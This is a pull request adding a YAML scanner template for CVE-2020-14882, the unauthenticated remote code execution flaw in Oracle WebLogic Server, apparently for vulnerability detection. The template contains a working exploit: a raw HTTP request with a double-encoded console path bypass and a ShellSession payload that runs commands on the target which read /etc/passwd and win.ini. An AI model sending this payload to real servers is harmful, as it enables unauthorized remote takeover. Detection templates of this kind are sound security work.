### PR TITLE
Add CVE-2020-14882

### DIFF
--- a/cves/CVE-2020-14882.yaml
+++ b/cves/CVE-2020-14882.yaml
@@ -1,0 +1,41 @@
+id: cve-2020-14882
+
+info:
+  name: Oracle WebLogic Server Unauthenticated RCE
+  author: dwisiswant0
+  severity: critical
+  description: |
+    Vulnerability in the Oracle WebLogic Server
+    product of Oracle Fusion Middleware (component: Console).
+    Supported versions that are affected are 10.3.6.0.0,
+    12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
+    Easily exploitable vulnerability allows unauthenticated
+    attacker with network access via HTTP to compromise the server.
+    Successful attacks of this vulnerability can result in takeover.
+
+  # References:
+  # - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
+  # - https://twitter.com/jas502n/status/1321416053050667009
+  # - https://youtu.be/JFVDOIL0YtA
+
+requests:
+  - payloads:
+      command:
+        - "cat%20%2Fetc%2Fpasswd"
+        - "type%20C%3A%5CWindows%5Cwin.ini"
+    raw:
+      - |
+        POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Content-Type: application/x-www-form-urlencoded; charset=utf-8
+
+        _nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27{{'command'}}%27);%22)
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+          - "\\[(font|extension|file)s\\]"
+          - "=UnexpectedExceptionPage"
+        condition: or
+        part: body


### PR DESCRIPTION
**Oracle WebLogic Server Unauthenticated RCE**
> Vulnerable versions: 10.3.6.0.0,
    12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.